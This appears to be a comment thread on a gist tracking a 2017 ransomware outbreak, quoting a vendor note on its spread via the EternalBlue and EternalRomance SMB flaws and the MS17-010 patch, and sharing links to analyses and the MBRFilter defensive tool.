The new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability CVE-2017-0144 (also known as EternalBlue), which was fixed in security update MS17-010 and was also exploited by WannaCrypt to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for CVE-2017-0145 (also known as EternalRomance, and fixed by the same bulletin)

Machines that are patched against these exploits (with security update MS17-010 https://technet.microsoft.com/en-us/library/security/ms17-010.aspx) or have disabled SMBv1 (https://support.microsoft.com/kb/2696547) are not affected by this particular spreading mechanism

from block https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759#vulnerabilitiesvectorsactions
to plain-format or insert it into the quote. Code-format for this information is not readable.

Please, add link In ExPetr/Petya’s shadow, FakeCry ransomware wave hits Ukraine https://securelist.com/in-expetrpetyas-shadow-fakecry-ransomware-wave-hits-ukraine/78973/

Russian language version of post «Analysis of TeleBots’ cunning backdoor» (https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/) https://geektimes.ru/post/290779

ransomware prevent open source code based on freebsd os adding my firewall if anyone knows that link pls send me
my mail id [email protected]

MBRFilter source code https://github.com/Cisco-Talos/MBRFilter